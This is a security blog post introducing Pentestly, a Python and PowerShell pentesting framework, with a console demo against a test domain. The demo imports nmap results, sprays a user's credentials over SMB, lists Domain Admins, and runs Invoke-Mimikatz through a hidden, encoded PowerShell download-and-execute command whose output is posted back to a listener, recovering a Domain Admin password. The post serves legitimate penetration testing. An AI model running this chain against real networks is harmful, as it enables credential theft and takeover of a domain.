Ads Top

Pentestly Framework: When Pentesting Meets Python and Powershell

Python appears to be an ever growing trend in the security community. Being able to connect Python tools together has proven beneficial for us. Powershell has also seen increasingly more use due to its wide availability in internal environments. Pentestly utilizes the power of these tools together in a familiar user experience.
enter image description here
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:
recon-ng - Backend database for recon-ng is beautifully made and
leveraged in Pentestly for data manipulation - Allows us to execute Powershell commands quickly and
easily via WMI - Useful utility for enumerating SMB shares
Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell
Below is a proof of concept demonstration of using Pentestly to auto detect Domain Admin from Domain User credentials (from Gladius) using Invoke-Mimikatz.

Demo - one step at a time
Import XML
As with any engagement, XML nmap results from our environment are imported into Pentestly:
[pentestly][demo] > load nmap
[pentestly][demo][nmap_xml] > set FILENAME /home/cduplantis/engagement/port-445.xml
FILENAME => /home/cduplantis/engagement/port-445.xml
[pentestly][demo][nmap_xml] > run
[*] 3 new records added.

[*] 3 total (3 new) ports found.
[pentestly][demo][nmap_xml] > show ports
  | rowid |   ip_address   | host | port | protocol |  module  |
  | 1     |   |      | 445  | tcp      | nmap_xml |
  | 2     | |      | 445  | tcp      | nmap_xml |
  | 3     | |      | 445  | tcp      | nmap_xml |
Credentials, credentials, credentials
We begin by attempting to authenticate with the following credentials received from Gladius:
zojix \ nsportsman : password1!
[pentestly][demo] > load login
[pentestly][demo][login] > set username nsportsman
[pentestly][demo][login] > set password password1!
[pentestly][demo][login] > set domain zojix
[pentestly][demo][login] > run
[*] Success - nsportsman:[email protected]
[*] Fail - nsportsman:[email protected]
[*] Success - nsportsman:[email protected]
[*] Testing execution access of credentials
[*] Execution: zojix\nsportsman:[email protected] - echo
[*] Failed to execute: zojix\nsportsman:[email protected]
[*] Execution: zojix\nsportsman:[email protected] - echo
[*] Successful execution: zojix\nsportsman:[email protected]
w00t! The key take away here is the following line:
[*] Successful execution: zojix\nsportsman:[email protected]
This tells us that we do have execution rights on
WhoDunIt? Domain Admins
One useful cross-reference point is to grab the Domain and Enterprise admin list so that if we come across that user’s credentials in the domain, Pentestly will know that we have Domain Admin credentials.
[pentestly][demo] > load get_dom # fuzzy searching for get_domain_admin_names
[pentestly][demo][get_domain_admin_names] > run
[*] Execution: zojix\nsportsman:[email protected] - net groups "Domain Admins" /domain
[*] Found Domain Admin: zojix\Administrator
[*] Found Domain Admin: zojix\TheRealDA
[*] Execution: zojix\nsportsman:[email protected] - net groups "Enterprise Admins" /domain
[*] Found Enterprise Admin: zojix\Administrator
[*] Found Enterprise Admin: zojix\TheRealDA
Mimikatz all the things
For the grand finale, let’s mimikatz the machines that we have execution access.
[pentestly][demo] > load mimi # Again, fuzzy searching for mimikatz
[pentestly][demo][mimikatz] > run
[*] Execution: zojix\nsportsman:[email protected] - powershell -window hidden -exec bypass -NonInteractive -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBE…
...snip long command…
[*] Waiting for Powershell results - - [04/Feb/2016 07:56:46] "GET /about.html HTTP/1.1" 200 - - - [04/Feb/2016 07:56:50] "POST / HTTP/1.1" 200 -
Starting web server
After parsing the Mimikatz output, Pentestly attempts to cross reference the user list with the Domain Admin list and immediately recognizes a Domain Admin in the Mimikatz output. Here, Mimikatz recognized a Domain Admin logging into a user workstation machine. Silly, DA.
[*] Success! TheRealDA:<leetpassword>tryGUESSINGthisdrowssaP</leetpassword>  - DOMAIN ADMIN!
You have one DA, do you want to continue to find more? [yN]
  git clone
Powered by Blogger.